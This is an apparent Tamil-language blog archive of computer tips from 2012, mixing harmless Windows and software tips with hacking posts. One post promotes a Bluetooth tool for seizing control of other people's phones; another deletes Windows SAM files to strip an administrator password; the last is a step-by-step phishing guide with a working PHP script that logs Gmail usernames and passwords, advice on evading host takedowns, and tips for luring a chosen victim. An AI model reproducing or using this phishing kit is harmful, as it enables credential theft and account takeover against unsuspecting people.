பிப்ரவரி 2012 | HACKING ALL PRODUCT.
Recommend on Google

0 FaceBook Messenger v5.8

  நான் இன்று இடப்போகும் இடுகை நமது வாழ்க்கையோடு பின்னிப்பிணைந்த ஒரு சமூக இணையத்தளமான Facebook பற்றியதாகும்.


இன்று அதிக மக்களை தன்னகத்தே கொண்டுள்ள இணையத்தளம் இந்த Facebook ஆகும்.

இந்த Facebook இணையத்தளம் தற்போது தனக்கே சொந்தமான ஒரு Messenger ஐ அறிமுகப்படுத்தியுள்ளது.


இதைப்பதிவிறக்கி உங்களது E-mail , Password என்பவற்றை type செய்து Login ஐ click செய்தால் ஒரு window திறக்கும், பிறகு சந்தோசம் தான்.

இதைப்பதிவிறக்க Download FaceBook Messenger v5.8
                                                                                                                                 ஐ click செய்யவும்.

                                                         Please Write your comment.

0 How To Increase Internet Speed.


இறுதியாக பதிவுசெய்த Mobile Phone Hacking என்ற இடுகை அனைவருக்கும் மிகவும் பயனளித்திருக்கும் என்ற நம்பிக்கையோடு எனது அடுத்த இடுகையை தொடருகிறேன். இன்று நான் இடப்போகும் இடுகை எப்படி நமது இணைய வேகத்தை அதிகரிப்பது பற்றி (How To Increase  Internet Speed).



1.      Click Start →→→Open Control Panel →→→Open Network Connection.



2.     Right Click Wireless Network Connection (இது எனது இணைய இணைப்பு) And Click Properties.




1.   3.      Click Internet Protocol (TCP/IP) →→→ Click Properties.


4.     " Tick Use the following DSN server addresses."


208. 67.222.222
208. 67 220.220

5.   Finally Click OK , click CLOSE  பிறகு உங்களது இணைய இணைப்பை நிறுத்தி மீள் துவக்கவும்.





Please Write your comment.

7 Mobile Phone Hacking.

Hello Friends,இன்றைக்கு நான் உங்களுக்கு சொல்லித்தரவிருப்பது யாராவது ஒருவருடைய தொலைபேசியை நமது கட்டுப்பட்டுக்குள் கொண்டு வரும் ஒரு சிறிய மென்பொருளை (software)ஐப் பற்றி.


இந்த மென்பொருளின் பெயர் Super Bluetooth Hack v. 1.08 . இந்த மென்பொருளை உங்கள் கணணியில் நிறுவி,பிறகு யாருடைய தொலைபேசியை வேண்டுமானாலும் உங்கள் கட்டுப்பாட்டுக்குள் கொண்டு வரலாம்.




                                


அதற்கு முதலில் உங்கள் கணணியிலிருந்து, நீங்கள் கட்டுப்பாட்டுக்குள் கொண்டு வரவிருக்கும் தொலைபேசியின் உரிமையாளர் விரும்பக்கூடிய ஏதாவது ஒன்றை (Wallpaper,Ringing Tone) Bluetooth மூலமாக அவருடைய தொலைபேசிக்கு அனுப்ப வேண்டும்.


ஏனென்றால்,முதன் முதலில் ஒருவருடைய தொலைபேசிக்கு Bluetooth மூலம் ஒரு புகைப்படத்தை அனுப்பும் போது, அது ஒரு கடவுச்சொல்லை (password) வினவும்.
ஒரே மாதிரியான கடவுச்சொல்லை கொடுத்து இருவரும் முதல் முறை ஒன்றை பரிமாறிக்கொண்டால்,இனி அவருடைய தொலைபேசிக்கு உரிமையாளர் நாம் தான்.


                                                                பிறகு
1.இலவச தொலைபேசி அழைப்பு
2.செய்திகளை பார்க்கலாம்
3.பிறரின் தொலைபேசி இலக்கம்
4.சுயவிவரத்தை (Profile) மாற்றலாம்
5.தொலைபேசியை மீள் இயக்கலாம் (Restart)                இன்னும் பல..................

                                                                 Download Super Blue Tooth Hack

                                                      Please Write Comments.

0 மென்பொருட்​களை பயன்படுத்தா​மல் Administra​tor Password-ஐ நீக்குவதற்​கு.


தனிநபர் கணினிகளிலுள்ள தகவல்களை மற்றவர்கள் பார்வையிடா வண்ணம் மறைப்பதற்கு கடவுச்சொல்லை பயன்படுத்துவோம். சில சந்தர்ப்பங்களில் கொடுக்கப்பட்ட கடவுச் சொல்லை மறந்துவிட்டு செய்வதறியாது தவிப்போம். பின்வரும் முறையை பின்பற்றுவதன் மூலம் Administrator கடவுச் சொல்லை மிக இலகுவாக இல்லாமற் செய்யமுடியும்.
1.கடவுச் சொல் நீக்கவேண்டிய கணினியிலிருந்து அதன் Hard Disk-ஐ வேறாக்கி பிறிதொரு கணினியுடன் இணைக்கவும்.
2.இப்பொழுதது கணினியை Boot செய்யவும்.  (இதன்போது கடவுச்சொல் நீக்கவேண்டிய வன்றட்டு இரண்டாம் நிலை சாதனமாக இருக்க வேண்டும் – secondary hard disk)
3.கணினி இயங்கியதும் Mycomputer பகுதிக்கு சென்று இரண்டாம் நிலை வன்றட்டில் windows இயங்குதளம் நிறுவியிருக்கும் பகுதியை திறக்கவும்.
4. அதனைத்தொடர்நது windows->system32->config எனும் பகுதிக்கு செல்லவும்.
5.அங்கு காணப்படும் SAM.exe, SAM.log ஆகிய கோப்புக்களை அழித்துவிடவும்.
இப்பொழுது அக்கணினியிலிருந்து வன்றட்டை அகற்றி பழைய கணினியில் இணைத்து இயக்கவும். ஏற்கணவே நிறுவியிருந்த கடவுச் சொல் அகற்றப்பட்டு கணினி சாதாரணமாக இயங்கும்.



Please Write your comment.

0 Shortcut Icon இல் உள்ள அம்புக்குறியை நீக்குவதற்கு...

நமது கணணியின் முன் திரையில் உள்ள மென்பொருட்களுக்கான Shortcut Icon இல் அம்புக்குறி ஒன்று இருப்பதை யாவரும் அறிந்திருப்பீர்கள். இது சிலருக்கு வேண்டப்படாத ஒன்றாகக் கூட சிலவேளைகளில் அமையலாம். இது நீக்கப்பட்டால் நன்றாயிருக்குமென கூட சிலர் எண்ணியிருக்கலாம்.
எனவே அவ் அம்புக்குறி இருப்பதை விரும்பாதவர்களுக்காய் இப்பதிவு அமையுமென எதிர்பார்க்கின்றேன்.

இதற்கு முதலில் START இல் சென்று அங்கு தேடல் பகுதியில் “regedit”  எனக்கொடுத்து திறந்துகொள்ளவும். அல்லது START இல் சென்று RUN என்பதை கிளிக்செய்து “regedit” எனக்கொடுத்து திறந்துகொள்ளவும்.


பின்னர் இதிலே கீழ்காட்டிய ஒழுங்கில் சென்று “Explorer”” என்பதை அடையவும்.


 HKEY_CURRENT_USER\Software\ Microsoft\Windows\ CurrentVersion\Explorer


இப்போ மேலுள்ள படத்தில் காட்டியவாறு வலப்பக்கத்தில் உள்ள link என்பதை Right-Click செய்து Modify என்பதைக் கொடுத்து திறந்துகொள்ளவும். இப்போ விண்டோ ஒன்று திறக்கும் அதிலே கீழ் காட்டியவாறு இலக்கத்தை மாற்றியபின் OK பண்ணவும்.

இப்போ Shortcut Iconஇல் உள்ள அம்புக்குறியானது நீக்கப்பட்டுவிடும்.


                           Please Write your comment.

0 கணனியிலுள்ள வைரஸ் மென்பொருள் (Anti Virus) ஒழுங்காக வேலை செய்கின்றதா என பரிசோதித்து(Check) பார்ப்பது எப்படி?




உங்கள் கணனியில் நீங்கள் நிறுவியிருக்கும் Anti-Virus மென்பொருளானது சிலவேளைகளில் அதனுடைய செயற்பாட்டை இழந்தோ அல்லது புதிய வைரஸ்களை இனங்கான முடியாமலோ இருக்கலாம். அத்தகைய நேரங்களில் உங்கள் கணனியிலுள்ள Anti-Virus மென்பொருளை பரிசோதித்து பார்ப்பதற்கான வழிமுறைதான் இது.

முதலில் Notepad ஐ திறந்து கொள்ளுங்கள் (open Notepad)

கீழே தரப்பட்டுள்ள Code ஐ பிரதி செய்து Notepad இல் இடுங்கள்.
(Copy this Code in text file)


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*






இதனை fakevirus.exe என்னும் பெயரில் சேமித்து கொள்ளுங்கள். அப்பொழுது நீங்கள் சேமித்த இந்த ஆவணமானது உடனே அழிக்கப்பட்டிருப்பதை நீங்கள் காண்பீர்கள். எனவே உங்கள் கணனியிலுள்ள Anti-Virus ஆனது ஒழுங்காக செயற்படுகின்றது.

                     Please Write your comment.

0 கணனிக்கு தேவையான அடிப்படை மென்பொருட்களின் பொதி

கணணியை புதியதாக வாங்குபவர்கள் அல்லது கணனியில் புதியதொரு இயங்குதளத்தை (Operating system) நிறுவினால் அததற்கு சில அடிப்படையான மிக மென்பொருட்கள் தேவைப்பாடு அவற்றை எல்லாம் ஒவ்வொன்றாக தேடி எடுத்து நிறுவுவது என்பது மிக ஒரு கடினமான விடயம். அப்படியானவற்றை ஒவ்வொன்றாக எடுத்து நிறுவுவது என்பது நேரம் விரயமான செயல். அப்படியான மென்பொருட்களை ஒரே மென்பொருளில் எடுத்து நிறுவினால் மிக இலகுவாக இருக்கும் அத்தகைய ஒரு மென்பொருள் பொதி பற்றிய பதிவுதான் இது.

                                               




Ninite என்னும் மென்பொருளானது எல்லாவற்றையும் ஒரே குடையின் கீழ் பெறக்கூடியதான ஒரு மென்பொருளாகும். இந்த மென்பொருளானது இலவசமான ஒரு மென்பொருள் என்பது குறிப்பிடத்தக்கதொரு விடயமாகும். இந்த மென்பொருளில் இணைய உலாவிகள் (Web Browsers), தகவல் பரிமாற்ற ஊடகங்கள் (Messaging),காணொளி, ஒலி ஊடகங்கள் (Media Players) , புகைப்பட வடிவமைப்பு மென்பொருட்கள் (Imaging), ஆவணமென்பொருட்கள் (Documents), கணணி பாதுகாப்பு(Security), போன்ற இன்னும் பல மென்பொருட்களை உள்ளடக்கியதாக இந்த மென்பொருள் பொதி காணப்படுகின்றது. மிகவும் பயனுள்ள இலவச மென்பொருள் என்பது மிகவும் சிறப்பான விடயமாகும்.




                        


மென்பொருள் தரவிறக்க:http://ninite.com/


Please Write your comment.

0 இலவச கணிப்பொறி(Calculator)

கணிப்பொறிகள்(Calculators) கணனிகளுக்கு முற்பட்ட காலத்திலேயே கண்டுபிடிக்கப்பட்டுவிட்டன. கணிப்பொறிகளின் அடுத்த தலைமுறையாகத்தான் கணனிகள் கருதப்படுகின்றன. அத்தகைய கணிப்பொறிகள் இன்று கணனியில் பயன்படுத்தக்கூடிய விதத்தில் மென்பொருளாக வெளிவருகின்றன. அவ்வாறானதொரு கணிப்பொறி மென்பொருள் Red Crab. 


                                             






Red Crab எனப்படும் இந்த இலவச மென்பொருளானது விஞ்ஞானரீதியாக பயன்படுத்தக்கூடிய விதத்தில் உருவாக்கப்பட்டுள்ளது. இந்த மென்பொருளை உங்கள் கணனியில் நிறுவவேண்டிய(Installation) அவசியம் இல்லை. இந்த மென்பொருளை பயன்படுத்தி நீங்கள் வழங்கும் தரவுகளுக்கு ஏற்ற முறையிலே வரைபுகளையும் தயரித்துக்கொள்ளமுடியும். மிகவும் பயனுள்ளதொரு மென்பொருள்.


                       Please Write your comment.

0 விண்டோஸ் XP-டிப்ஸ்-1

               விண்டோஸ் XP-ல் CD/DVD autoplay ஆவதை நிறுத்த1) Click Start, Run சென்று GPEDIT.MSC தட்டச்சு செய்யவும்
2) வரும் திரையில் Computer Configuration, Administrative Templates, System செல்லவும்
3) வலது புறம் Turn autoplay off டபுள் க்ளிக் செய்து enable செய்யவும்


விண்டோஸ் XP -ல் பூட் பிளாப்பி உருவாக்குவது எப்படி?
புதிய பிளாப்பி டிஸ்க்கை அதன் டிரைவில் நுழைக்கவும்
MY Computer சென்று பிளாப்பி டிஸ்க் icon- ஐ வலது க்ளிக் செய்து format தேர்வு செய்யவும்
வரும் திரையில் format option சென்று Create an MS-DOS startup disk என்பதை தேர்வு செய்யது ok கொடுக்கவும்.
இதற்கு குறைந்தது 5 பிளாப்பி டிஸ்க் தேவைப்படும்.
ஒருவேளை உங்களிடம் கணினியை பூட் செய்ய விண்டோஸ் XP CD இல்லைஎன்றால் இந்த பிளாப்பியை பயன்படுத்தி பூட் செய்யலாம்.









Please Write your comment.

1 மின்னஞ்சல் தகவல் திருட்டு (Email hacking)


இன்று நாம் பார்க்கப்போவது "பிஸ்சிங்என்று சொல்லப்படுகின்ற ஓர் தகவல்திருட்டு முறை பற்றியாகும்

இந்த பிஸ்ஸிங் முறை பற்றி பலரும் அறிந்திருப்பீர்கள்அதாவது நான் ஒருகொந்தர் என்று மார் தட்டும் அனைவரும் இந்த முறையை கற்றுத்தேர்ந்து தான்வந்திருப்பார்கள்ஆனால் கொந்தர்கள் உலகத்தில் மிக மிக சின்னபிள்ளை தனமானஅல்ல மிகவும் ஆரம்பகட்டமாக தாக்குதல் முறையாகவே இம்முறைமைகொள்ளப்படுகின்றதுசரி நாங்கள் இம்முறைபற்றி சற்று விலாவரியாகபார்த்துவிடலாம்


பிஸ்ஸிங் என்பது நாம் பிரவேசிக்கும் தளத்தினை போன்றே இருக்கும் ஓர்போலித்தளத்தினை உருவாக்கி அத்தளத்தினுாடக தகவல்திருட்டினில்ஈடுபடுவதாகும்உதாரணமாக நீங்கள் ஜிமெல் கணக்கு வைத்திருப்பவர் என்றுவைத்துக்கொள்வோம்நீங்கள் உங்கள் மின்னஞ்சல் முகவரிக்கு விஜயம் செய்யும்போது அதே போன்று அச்சு அசல் காட்சியளிக்கும் ஓர் தளத்தினை தாக்குதல் தாரிஉங்களுக்கு காண்பிப்பார்நீங்களும் அவசரத்தில் உங்கள் புகுபதிகை தரவுகளைஅதிலே தந்து விடுவீர்கள்பிறகென்ன உங்கள் தகவல்கள் குறித்த கொந்தரின்கைகளுக்கு சென்றுவிடும்

இது ஒரு நொடிப்பொழுதினிலே நடக்கும் தாக்குதலாகும்அதுவும் நீங்கள்கவனயீனமாக இருக்கும் சந்தர்ப்பங்களில் மாத்திரமே சாத்தியமாகின்றதுஇத்தாக்குதல்சரி நாம் தாக்குதல் என்றால் என்ன என்று பார்த்தாகி விட்டதுஇனிநாங்கள் எவ்வாறு ஒருபோலி தளத்தினை உருவாக்குவது மற்றும் எவ்வாறுஅத்தளத்தினை மற்றவருக்கு கொண்டு சென்று சேர்ப்பது என்பதையும் அத்துடன்உங்களுக்கு யாராவது இம்முறைமூலம் தாக்குதல் நடத்த முயன்றால் எவ்வாறுஉங்களை பாதுகாத்துக்கொள்வது என்றும் நாம் பார்க்கலாம்.


போலி தளம் தயாரித்தல்

சரிமுதலில் நீங்கள் என்னமாதிரியான போலித்தளத்தினை தயாரிக்க போகின்றீர்கள்என்று முடிவு செய்துகொள்ளுங்கள்நான் உங்களுக்காக ஜிமெல் போன்றேகாட்சியளிக்கின்ற ஓர் போலித்தளத்தினை உருவாக்கி அதனை எவ்வாறு நாம் தாக்கநினைப்பவருக்கு அனுப்பவதும் என்று காட்டப்போகின்றேன்.

1. முதலில் உண்மையான ஜிமெயில் தளத்திற்கு செல்லுங்கள்அங்கு உங்கள்உலவியில் "Right click" செய்து "View page source" என்பதினை தெரிவு செய்துகொள்ளுங்கள்
2. இப்பொழுது நீங்கள் ஜிமெயிலின் source code பார்க்க கூடியதாக இருக்கும்.இப்பொழுது நீங்கள் Ctrl + A ஒரே சமயத்தில் அமுக்கு அனைத்து கோடிங்குகளையும்தெரிவு செய்து கொள்ளுங்கள்.


3. இப்பொழுது நீங்கள் உங்கள் கணனியில் Note pad  திறந்து கொள்ளுங்கள்.அதிலே நீங்கள் தெரிவு செய்து வைத்திருப்பதை Ctrl + V சொடுக்கி  போஸ்ட் செய்துகொள்ளுங்கள்.


4. இப்பொழுது முழு கோடிங்கும் நீங்கள் பார்க்க கூடியதாக இருக்கும்இனி நீங்கள்படத்தில் காட்டியவாறு "Tools---> find and replace" தெரிவு செய்துவிட்டு "Action" என்றசொல்லினை தேடி அதனை "input.php" என்று பெயர் மாற்றம் செய்து கொள்ளுங்கள்.



5. இப்பொழுது நாம் மாற்றம் செய்த கோப்பினை index.html என்ற பெயரில் ஓர்கோப்பினில் சேமித்துக்கொள்ள வேண்டும்


                                                


நீங்கள் கேக்கலாம் அது ஏன் action என்ற தொடுப்பு இருந்த இடத்திலே நாம் ஏன்input.php என்று மாற்றம் செய்தோம் என்றுஅதாவது நீங்கள் குறிவைத்திருப்பவர்தனது தரவுகளை நீங்கள் அனுப்பும் இந்த பக்கத்தில் வழங்கி விட்டு login சொடுக்கும் போது உங்கள் சர்வரில் அவரது தரவுகளை பதித்து விட்டு அவரை நாம்உண்மையான ஜிமெயிலின் தளத்திற்கு கைகாட்டி விட்டு விடுவோம்என்னநடக்கின்றது தெரியாமல் குழம்பிப்போய் நிப்பாரு நம்மாளுசரி அந்த input.phpஎன்ற கோப்பினை எவ்வாறு உருவாக்குவாது என்பதினை பார்த்துவிடலாம்இங்கேகீழே காணப்படுகின்ற இந்த கோடிங்கினை கொப்பி செய்து ஒரு Note pad ல் ஒட்டிவிடுங்கள்அந்த கோப்பினை input.php என்ற பெயரினில் ஏற்கனவே index.htmlகோப்பு இருக்கும் இடத்தில் சேமித்துவிடுங்கள்



  1. <?php /* Created on: 5/08/2011 By: Spid3rB0il66*/
  2. $fp = fopen("password.txt", "a");
  3. fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]");
  4. echo "<HTML>
  5.  
  6. <head>
  7. <title>Welcome to Gmail</title>
  8. <FRAMESET cols=\"*\">
  9.  <FRAME SRC=\"https://www.google.com/accounts/ServiceLoginAuth\">
  10.  
  11.  
  12.  
  13.  
  14.  
  15. </FRAMESET>";?>
  16.  
  17.  
  18.  
     









            உங்கள் வேலை இன்னமும் முடியவில்லைநீங்கள் சேமித்து வைத்திருக்கும்இடத்தினில் password.txt எனும் பெயரில் ஓர்  சாதாரண text file ஒன்றினைசேமித்துக்கொள்ளுங்கள்இப்பொழுது எங்கள் ஜிமெயிலின் போலிப்பக்கத்தினைசர்வர் ஒன்றினை உருவாக்கி எவ்வாறு சேமிப்பது என்று பார்த்து விடலாம்.





கோப்புக்களினை
 பதிவேற்றம் செய்தல்.

இணையத்திலே பல நிறுவனங்கள் இலவசமாக Web hosting வசதிகளைவழங்குகின்றனஅனேக தளங்கள் இந்த மாதிரியான போலிப்பக்கங்கள் பதிவேற்றம்செய்யும் சந்தர்ப்பத்தில் அவற்றினை இனங்கண்டு அழித்துவிடுவதற்கென பலScripts தன்னகத்தே கொண்டுள்ளனஆக நீங்கள் உங்கள் போலிப்பக்க்தினைபதிவேற்றம் செய்து அடுத்த நிமிடமே உங்கள் கணக்கு முடக்கப்படலாம்.துவண்டுவிடாமல் பல தளங்களிலும் உங்கள் கோப்பினை பதிவேற்றம் செய்யவேண்டும்அப்பொழுது தான் பத்தில் ஒன்றாவது வேலை செய்யும்.  சரி.இலவசமாக Web hosting வசதினை வழங்கும் நிறுவனங்கள் அனைத்தையும்தன்னகத்தே கொண்ட ஓர் தளம் தான் www.free-webhosts.com தளமாகும்.இத்தளத்தினிலே இலவசமாக சேவையை வழங்கும் நிறுவனங்கள்பட்டியலிடப்பட்டிருக்கும்விளம்பரங்கள் இல்லாத தளமாய் ஒன்றினை தெரிவுசெய்து அதிலே உங்களுக்கு ஓர் கணக்கினை உருவாக்கி கொள்ளுங்கள்.www.byethost31.com தான் என்னுடைய பரிந்துரைப்புஏன் என்று சொன்னால்இத்தளத்தில் போலிப்பக்கங்களை கண்டு பிடிப்பதற்கான Scripts இருந்தும் அவைசரிவர இயங்கவில்லை.


இனி நீங்கள் செய்யவேண்டியது எல்லாம் நீங்கள் இலக்குவைத்திருப்பவரைஅவருடைய கணக்கு புகுபதிதை தகவல்களை இந்த போலித்தளத்திலேவழங்குவதற்கு ஒரு சந்தர்ப்பத்தினை உருவாக்க வேண்டும்தெளிவாககூறப்போனால் அவரை ஏமாற்றி உங்கள் சதி வலையில் சிக்க வைக்க வேண்டும்.அந்த பெரிய ஈபிள் கோபுரத்தினையே ஒருவர் தன்னுடையது என்று கூறி பலதடவைகள் விற்க முயற்சித்திருக்கின்றார்நீங்கள் சாதாரண இந்த இலக்கினைஏமாற்ற முடியாதா? Best social engineering skill தான் தேவை என்கிற அவசியம்இல்லைசும்மா சாதாரண கள்ள புத்தி இருந்தாலே போதும்எல்லாம் இலகுவாகிவிடும்சரிஎனக்கு நீங்கள் திட்டுவது புரிகின்றது ஏன்டா இந்தளவும் அழகா சொல்லிதந்துவிட்டு ஏன் கடைசில சொதப்பல் என்று தானே திட்டுறீங்கஇதே அதையும்காட்டிடுறன்.

ஒரு புதிய மின்னஞ்சல் கணக்கு ஒன்றினை ஆரம்பித்துக்கொள்ளுங்கள்அப்பொழுதுதான் நீங்கள் போலித்தளத்துடன் அனுப்பும் மின்னஞ்சல் Junk folderல் செல்லாமல்inbox ற்கு செல்லும்சரிதற்காலத்தில் என்ன விடையம் பரபரப்பாக இருக்கின்றதோஅதனை சம்பந்தப்படுத்தி ஓர் அழகிய மி்ன்னஞ்சல் ஒன்றினைஉருவாக்கிக்கொள்ளுங்கள்உங்கள் இலக்கு அதாவது நீங்கள் தாக்கவிருப்பவருக்குஎன்ன விடையங்கள் பிடிக்கும் என்று அவருடைய முகப்புத்தகத்தில் சென்றுபார்த்தீர்களேயானால் இலகுவாக கண்டறிந்துவிடலாம்மின்னஞ்சலினைதயாரித்துவிட்டு இறுதியினிலே படத்தினிலே காட்டப்பட்டிருப்பது போன்றுஉண்மையான ஒரு தொடர்பின் பின் உங்கள் போலித்தளத்தின் சுட்டியினை வழங்கிவிடுங்கள்இலக்கு அந்த சுட்டியிலே சொடுக்கி சென்று பார்க்க கூடியவாறு உங்கள்மின்னஞ்சல் கவர்ச்சிகரமாக இருக்கவேண்டும் என்பதினை மறந்துவிடாதீர்கள்                                                                                     
                 


                                                 Please Write your comment.

Hello Friends இப்போது என்னிடம் தமிழில் 4 புத்தகங்கள் இருக்கின்றன. அவற்றை உங்களோடு பகிர்ந்து கொள்ள விரும்புகிறேன். அதில் உங்களுக்கு மிகவும் பயனளிக்க கூடியது எது என்பதை தெரிந்து வாக்களிக்கவும்.